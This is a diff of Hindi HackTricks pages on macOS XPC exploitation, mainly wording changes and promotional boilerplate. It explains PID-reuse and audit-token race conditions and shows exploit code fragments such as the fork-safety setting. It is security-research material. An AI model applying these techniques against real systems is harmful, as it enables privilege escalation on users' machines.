+यदि एक डेवलपर क्लाइंट के संस्करण की जांच करना नहीं चाहता, तो वह कम से कम यह जांच सकता है कि क्लाइंट प्रोसेस इंजेक्शन के प्रति संवेदनशील नहीं है:

 {% code overflow="wrap" %}
 ```objectivec
@ -85,16 +108,16 @@ if ((csFlags & (cs_hard | cs_require_lv)) {
 return Yes; // Accept connection
 }
 ```
-{% endcode %}
-
 <details>

-<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>

-* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
-* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह
-* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
-* **अपने हैकिंग ट्रिक्स साझा करें और PRs सबमिट करें** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को।**
+HackTricks का समर्थन करने के अन्य तरीके:
+
+* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
+* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
+* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
+* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें।

 </details>
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.md
@ -1,37 +1,39 @@
-# macOS PID पुनः उपयोग
+# macOS PID पुन: उपयोग

 <details>

-<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+<summary><strong> AWS हैकिंग सीखें शून्य से नायक तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

-* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family)
-* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
-* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल** हों या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)** का पालन करें**.
-* **अपने हैकिंग ट्रिक्स को** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में PR जमा करके अपना योगदान दें।**
+HackTricks का समर्थन करने के अन्य तरीके:
+
+* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
+* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
+* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
+* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) **का अनुसरण करें**.
+* **अपनी हैकिंग तकनीकें साझा करें PRs जमा करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में.

 </details>

-## PID पुनः उपयोग
+## PID पुन: उपयोग

-जब एक macOS **XPC सेवा** को **PID** पर आधारित नहीं, बल्कि **ऑडिट टोकन** पर आधारित कॉल किए गए प्रक्रिया की जांच कर रही होती है, तो यह PID पुनः उपयोग हमले के लिए संक्रमण योग्य होती है। यह हमला एक **रेस कंडीशन** पर आधारित होता है जहां एक **उत्पादन** एक **एक्सपीसी सेवा** को **संदेश भेजेगा** और उसके बाद ही, **`posix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ)`** को निष्पादित करेगा जिसमें **अनुमति** दी गई बाइनरी होगी।
+जब macOS **XPC सेवा** कॉल किए गए प्रोसेस की जांच **PID** के आधार पर कर रही होती है और **audit token** पर नहीं, तो यह PID पुन: उपयोग हमले के लिए संवेदनशील होती है। यह हमला एक **race condition** पर आधारित होता है जहां एक **exploit** **XPC** सेवा को संदेश भेजने जा रहा होता है **abusing** कार्यक्षमता का और ठीक **उसके बाद**, **`posix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ)`** को **allowed** बाइनरी के साथ निष्पादित करता है।

-यह फ़ंक्शन **अनुमति दी गई बाइनरी को PID स्वामित्व** देगा लेकिन **दुष्ट XPC संदेश** पहले ही भेज दिया जाएगा। इसलिए, यदि **XPC** सेवा **प्रोसेस की पहचान करने के लिए PID** का उपयोग करती है और इसे **`posix_spawn`** के **निष्पादन** के बाद **जांचती** है, तो यह सोचेगी कि यह एक **अधिकृत** प्रक्रिया से आता है।
+यह फंक्शन **allowed बाइनरी को PID का मालिक बना देगा** लेकिन **malicious XPC संदेश भेजा जा चुका होगा** उससे पहले। इसलिए, अगर **XPC** सेवा **PID** का उपयोग करती है **प्रमाणित** करने के लिए और इसे जांचती है **`posix_spawn`** के निष्पादन **के बाद**, तो यह सोचेगी कि यह एक **authorized** प्रोसेस से आया है।

-### हमले का उदाहरण
+### Exploit उदाहरण

-यदि आपको फ़ंक्शन **`shouldAcceptNewConnection`** या इसके द्वारा कॉल की जाने वाली फ़ंक्शन में **`processIdentifier`** को कॉल करते हुए नहीं देखा जाता है और **`auditToken`** को कॉल नहीं करते हैं, तो यह बहुत संभावित है कि यह प्रक्रिया PID की जांच कर रही है और ऑडिट टोकन नहीं।\
-जैसे कि उदाहरण के लिए इस छवि में (संदर्भ से ली गई):
+यदि आप फंक्शन **`shouldAcceptNewConnection`** या इसके द्वारा कॉल किए गए किसी फंक्शन को देखते हैं **calling** **`processIdentifier`** और **`auditToken`** को कॉल नहीं कर रहा है। यह बहुत संभावना है कि यह **प्रोसेस PID की जांच कर रहा है** और audit token की नहीं।\
+जैसे कि इस चित्र में (संदर्भ से लिया गया):

 <figure><img src="../../../../../../.gitbook/assets/image (4) (1) (1) (1) (2).png" alt=""><figcaption></figcaption></figure>

-इस उदाहरण हमले (फिर से, संदर्भ से लिया गया) को देखें जिसमें हमले के 2 हिस्से हैं:
+इस exploit उदाहरण को देखें (फिर से, संदर्भ से लिया गया) जिसमें exploit के 2 भाग हैं:

-* एक जो **कई forks उत्पन्न** करता है
-* **प्रत्येक fork** एक **पेलोड** को XPC सेवा को भेजेगा जबकि संदेश भेजने के बाद ही **`posix_spawn`** को निष्पादित करेगा।
+* एक जो **कई forks उत्पन्न करता है**
+* **प्रत्येक fork** **payload** को XPC सेवा को **भेजेगा** जबकि **`posix_spawn`** को संदेश भेजने के तुरंत बाद निष्पादित कर रहा है।

 {% hint style="danger" %}
-हमले को काम करने के लिए `export`` `**`OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES`** या हमले में डालना महत्वपूर्ण है:
+Exploit के काम करने के लिए यह महत्वपूर्ण है कि `export`` `**`OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES`** करें या exploit के अंदर डालें:
 ```objectivec
 asm(".section __DATA,__objc_fork_ok\n"
 "empty:\n"
@ -41,9 +43,7 @@ asm(".section __DATA,__objc_fork_ok\n"

 {% tabs %}
 {% tab title="NSTasks" %}
-पहला विकल्प **`NSTasks`** का उपयोग करके और बच्चों को उत्पन्न करने के लिए तर्क का उपयोग करके RC का शोषण करने के लिए।
-{% endtab %}
-{% endtabs %}
+पहला विकल्प **`NSTasks`** का उपयोग करते हुए और बच्चों को RC का शोषण करने के लिए आर्गुमेंट के साथ लॉन्च करना
 ```objectivec
 // from https://wojciechregula.blog/post/learn-xpc-exploitation-part-2-say-no-to-the-pid/
 // gcc -framework Foundation expl.m -o expl
@ -149,8 +149,10 @@ create_nstasks();
 return 0;
 }
 ```
+{% endtab %}
+
 {% tab title="fork" %}
-यह उदाहरण एक कच्चे **`fork`** का उपयोग करता है जो **PID रेस कंडीशन** का शिकार करने वाले **बच्चों को लॉन्च करेगा** और फिर **एक हार्ड लिंक के माध्यम से एक और रेस कंडीशन का शिकार करेगा:**
+यह उदाहरण एक कच्चे **`fork`** का उपयोग करता है जो **बच्चों को लॉन्च करेगा जो PID रेस कंडीशन का शोषण करेंगे** और फिर **एक और रेस कंडीशन का शोषण करेंगे एक Hard link के माध्यम से:**
 ```objectivec
 // export OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES
 // gcc -framework Foundation expl.m -o expl
@ -293,12 +295,14 @@ return 0;

 <details>

-<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+<summary><strong>htARTE (HackTricks AWS Red Team Expert) के साथ शून्य से नायक तक AWS हैकिंग सीखें</strong></summary>

-* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
-* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
-* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **ट्विटर** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)** का** **अनुसरण करें।**
-* **अपने हैकिंग ट्रिक्स साझा करें,** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **में PR जमा करके।**
+HackTricks का समर्थन करने के अन्य तरीके:
+
+* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) देखें!
+* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
+* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
+* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में शामिल हों या मुझे **Twitter** 🐦 पर **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।

 </details>
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md
@ -2,32 +2,34 @@

 <details>

-<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+<summary><strong>htARTE (HackTricks AWS Red Team Expert) के साथ शून्य से नायक तक AWS हैकिंग सीखें</strong></a><strong>!</strong></summary>

-* क्या आप **साइबरसिक्योरिटी कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँच चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
+HackTricks का समर्थन करने के अन्य तरीके:
+
+* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
 * [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
-* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में या **Twitter** पर मुझे **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
-* **अपनी हैकिंग ट्रिक्स साझा करें, PRs जमा करके** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **में.**
+* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
+* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में शामिल हों या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।

 </details>

-**यह तकनीक** [**https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/**](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/) **से कॉपी की गई थी**
+**यह तकनीक [**https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/**](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/) से कॉपी की गई थी**

 ## Mach Messages मूल जानकारी

-यदि आपको Mach Messages के बारे में पता नहीं है तो इस पृष्ठ को देखें:
+यदि आपको नहीं पता कि Mach Messages क्या हैं तो इस पृष्ठ की जांच करें:

 {% content-ref url="../../../../mac-os-architecture/macos-ipc-inter-process-communication/" %}
 [macos-ipc-inter-process-communication](../../../../mac-os-architecture/macos-ipc-inter-process-communication/)
 {% endcontent-ref %}

 फिलहाल याद रखें कि:
-Mach messages _mach port_ पर भेजे जाते हैं, जो कि mach kernel में निर्मित **एकल प्राप्तकर्ता, बहुसंख्यक प्रेषक संचार** चैनल है। **बहुत सारी प्रक्रियाएँ संदेश भेज सकती हैं** mach port पर, लेकिन किसी भी समय **केवल एक प्रक्रिया इससे पढ़ सकती है**। फाइल डिस्क्रिप्टर्स और सॉकेट्स की तरह, mach ports को कर्नेल द्वारा आवंटित और प्रबंधित किया जाता है और प्रक्रियाएँ केवल एक पूर्णांक देखती हैं, जिसका उपयोग वे कर्नेल को यह बताने के लिए कर सकते हैं कि उनके किस mach port का उपयोग करना चाहते हैं।
+Mach messages _mach port_ पर भेजे जाते हैं, जो कि मैक कर्नेल में निर्मित **एकल प्राप्तकर्ता, बहुसंख्यक प्रेषक संचार** चैनल है। **बहुत सारी प्रक्रियाएं** मैसेजेस एक mach port पर भेज सकती हैं, लेकिन किसी भी समय **केवल एक प्रक्रिया ही इससे पढ़ सकती है**। फाइल डिस्क्रिप्टर्स और सॉकेट्स की तरह, mach ports को कर्नेल द्वारा आवंटित और प्रबंधित किया जाता है और प्रक्रियाएं केवल एक पूर्णांक देखती हैं, जिसका उपयोग वे कर्नेल को यह बताने के लिए कर सकते हैं कि वे अपने किस mach port का उपयोग करना चाहते हैं।

 ## XPC कनेक्शन

-यदि आपको पता नहीं है कि XPC कनेक्शन कैसे स्थापित किया जाता है तो देखें:
+यदि आपको नहीं पता कि XPC कनेक्शन कैसे स्थापित किया जाता है तो जांचें:

 {% content-ref url="../" %}
 [..](../)
@ -38,28 +40,33 @@ Mach messages _mach port_ पर भेजे जाते हैं, जो क
 आपके लिए जानना दिलचस्प है कि **XPC का अमूर्तीकरण एक-से-एक कनेक्शन है**, लेकिन यह एक ऐसी तकनीक पर आधारित है जिसमें **बहुसंख्यक प्रेषक हो सकते हैं, इसलिए:**

 * Mach ports एकल प्राप्तकर्ता, _**बहुसंख्यक प्रेषक**_ हैं।
-* XPC कनेक्शन का audit token _**सबसे हाल ही में प्राप्त संदेश से कॉपी किया गया**_ audit token होता है।
+* एक XPC कनेक्शन का audit token _**सबसे हाल ही में प्राप्त संदेश से कॉपी किया गया**_ audit token होता है।
 * XPC कनेक्शन के **audit token** को प्राप्त करना कई **सुरक्षा जांचों** के लिए महत्वपूर्ण है।

-हालांकि पिछली स्थिति आशाजनक लगती है, कुछ परिदृश्य हैं जहाँ यह समस्याएँ पैदा नहीं करेगा:
+हालांकि पिछली स्थिति आशाजनक लगती है, कुछ परिदृश्य हैं जहां यह समस्याएं पैदा नहीं करेगा:

-* Audit tokens अक्सर एक प्राधिकरण जांच के लिए उपयोग किए जाते हैं ताकि यह तय किया जा सके कि क्या एक कनेक्शन स्वीकार करना है। जैसा कि यह सेवा पोर्ट को एक संदेश का उपयोग करके होता है, अभी तक **कोई कनेक्शन स्थापित नहीं हुआ है**। इस पोर्ट पर और अधिक संदेश केवल अतिरिक्त कनेक्शन अनुरोधों के रूप में संभाले जाएंगे। इसलिए किसी भी **जांच से पहले कनेक्शन स्वीकार करना सुरक्षित नहीं है** (इसका यह भी मतलब है कि `-listener:shouldAcceptNewConnection:` के भीतर audit token सुरक्षित है)। इसलिए हम **उन XPC कनेक्शनों की तलाश कर रहे हैं जो विशिष्ट क्रियाओं की जांच करते हैं**।
+* Audit tokens अक्सर एक प्राधिकरण जांच के लिए उपयोग किए जाते हैं ताकि यह तय किया जा सके कि क्या एक कनेक्शन को स्वीकार किया जाए। चूंकि यह सेवा पोर्ट को एक संदेश का उपयोग करके होता है, इसलिए **अभी तक कोई कनेक्शन स्थापित नहीं हुआ है**। इस पोर्ट पर अधिक संदेशों को केवल अतिरिक्त कनेक्शन अनुरोधों के रूप में संभाला जाएगा। इसलिए किसी भी **जांच से पहले कनेक्शन को स्वीकार करना सुरक्षित नहीं है** (इसका यह भी मतलब है कि `-listener:shouldAcceptNewConnection:` के भीतर audit token सुरक्षित है)। इसलिए हम **उन XPC कनेक्शनों की तलाश कर रहे हैं जो विशिष्ट क्रियाओं की जांच करते हैं**।
 * XPC इवेंट हैंडलर्स को सिंक्रोनसली संभाला जाता है। इसका मतलब है कि एक संदेश के लिए इवेंट हैंडलर को पूरा करना होगा इससे पहले कि इसे अगले के लिए बुलाया जा सके, यहां तक कि समानांतर डिस्पैच कतारों पर भी। इसलिए एक **XPC इवेंट हैंडलर के भीतर audit token को अन्य सामान्य (गैर-उत्तर!) संदेशों द्वारा अधिलेखित नहीं किया जा सकता**।

-इससे हमें दो अलग-अलग तरीकों का विचार आया जिससे यह संभव हो सकता है:
+इसने हमें दो अलग-अलग तरीकों के लिए विचार दिया जिससे यह संभव हो सकता है:

-1. विकल्प1:
+1. Variant1:
 * **Exploit** सेवा **A** और सेवा **B** से **जुड़ता है**
-* सेवा **B** सेवा A में एक **विशेषाधिकार प्राप्त कार्यक्षमता** को बुला सकती है जो उपयोगकर्ता नहीं कर सकता
-* सेवा **A** **`xpc_connection_get_audit_token`** को बुलाती है जबकि _**नहीं**_ एक कनेक्शन के लिए **इवेंट हैंडलर** के भीतर **`dispatch_async`** में।
+* सेवा **B** सेवा A में एक **विशेषाधिकार प्राप्त कार्यक्षमता** को कॉल कर सकती है जो उपयोगकर्ता नहीं कर सकता
+* सेवा **A** **`xpc_connection_get_audit_token`** को कॉल करती है जबकि _**नहीं**_ एक कनेक्शन के लिए **इवेंट हैंडलर** के भीतर **`dispatch_async`** में।
 * इसलिए एक **अलग** संदेश **Audit Token को अधिलेखित कर सकता है** क्योंकि यह इवेंट हैंडलर के बाहर असिंक्रोनसली डिस्पैच किया जा रहा है।
 * Exploit **सेवा B को सेवा A के लिए SEND अधिकार पास करता है**।
 * इसलिए svc **B** वास्तव में **संदेश भेज रही है** सेवा **A** को।
-* **Exploit** कोशिश करता है **विशेषाधिकार प्राप्त कार्यक्षमता को बुलाने के लिए**। RC में svc **A** इस **क्रिया** के प्राधिकरण की **जांच करती है** जबकि **svc B ने Audit token को अधिलेखित किया** (जिससे exploit को विशेषाधिकार प्राप्त कार्यक्षमता को बुलाने की पहुँच मिलती है)।
-2. विकल्प 2:
-* सेवा **B** सेवा A में एक **विशेषाधिकार प्राप्त कार्यक्षमता** को बुला सकती है जो उपयोगकर्ता नहीं कर सकता
-* Exploit **सेवा A** से जुड़ता है जो exploit को एक **संदेश भेजती है जिसकी एक उत्तर की उम्मीद है** एक विशिष्ट **प्रतिक्रिया** **पोर्ट** में।
-* Exploit **सेवा** B को एक संदेश भेजता है **उस प्रतिक्रिया पोर्ट को पास करते हुए**।
-* जब सेवा **B उत्तर देती है**, यह **सेवा A को संदेश भेजती है**, **जबकि** **exploit** एक अलग **संदेश सेवा A को भेजता है** जिससे वह एक **विशेषाधिकार प्राप्त कार्यक्षमता तक पहुँचने की कोशिश करता है** और उम्मीद करता है कि सेवा B से प्रतिक्रिया Audit token को सही समय पर अधिलेखित कर देगी (Race Condition)।
+* **Exploit** विशेषाधिकार प्राप्त कार्यक्षमता को **कॉल करने की कोशिश करता है**। RC में svc **A** इस **क्रिया** के प्राधिकरण की **जांच करती है** जबकि **svc B ने Audit token को अधिलेखित किया** (जिससे exploit को विशेषाधिकार प्राप्त कार्यक्षमता को कॉल करने की अनुमति मिलती है)।
+2. Variant 2:
+* सेवा **B** सेवा A में एक **विशेषाधिकार प्राप्त कार्यक्षमता** को कॉल कर सकती है जो उपयोगकर्ता नहीं कर सकता
+* Exploit **सेवा A** से जुड़ता है जो exploit को एक **संदेश भेजती है जिसकी एक प्रतिक्रिया की उम्मीद होती है** एक विशिष्ट **प्रतिक्रिया** **पोर्ट** में।
+* Exploit **सेवा** B को एक संदेश भेजता है जिसमें **उस प्रतिक्रिया पोर्ट को पास किया जाता है**।
+* जब सेवा **B प्रतिक्रिया देती है**, तो यह **सेवा A को संदेश भेजती है**, **जबकि** **exploit** एक अलग **संदेश सेवा A को भेजता है** जिससे वह विशेषाधिकार प्राप्त कार्यक्षमता तक पहुंचने की कोशिश करता है और उम्मीद करता है कि सेवा B से प्रतिक्रिया Audit token को सही समय पर अधिलेखित कर देगी (Race Condition)।

-## विकल्प 1: एक इवेंट हैंडलर के बाहर xpc\_connection\_get\_audit\_token को बुलाना <a href="#variant-1-calling-xpc_connection_get_audit_token-outside-of-an-event-handler" id="variant-1-calling-xpc_connection_get_audit_token-outside-of-an-event-handler"></a>
+## Variant 1: एक इवेंट हैंडलर के बाहर xpc\_connection\_get\_audit\_token को कॉल करना <a href="#variant-1-calling-xpc_connection_get_audit_token-outside-of-an-event-handler" id="variant-1-calling-xpc_connection_get_audit_token-outside-of-an-event-handler"></a>
+
+परिदृश्य:
+
+* दो mach **सेवाएं **_**A**_** और **_**B**_** जिनसे हम दोनों से जुड़ सकते हैं** (सैंडबॉक्स प्रोफाइल और कनेक्शन को स्वीकार करने से पहले प्राधिकरण जांचों के आधार पर)।
+* _**A**_ के पास एक विशिष्ट **क्रिया के
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-java-apps-injection.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-java-apps-injection.md
@ -2,13 +2,15 @@

 <details>

-<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
+<summary><strong> AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>

-* क्या आप **साइबरसिक्योरिटी कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन हैकट्रिक्स में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँचना चाहते हैं या हैकट्रिक्स को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
-* [**आधिकारिक PEASS & हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
-* [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**टेलीग्राम ग्रुप**](https://t.me/peass) में या **मुझे ट्विटर पर** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)** पर फॉलो करें।**
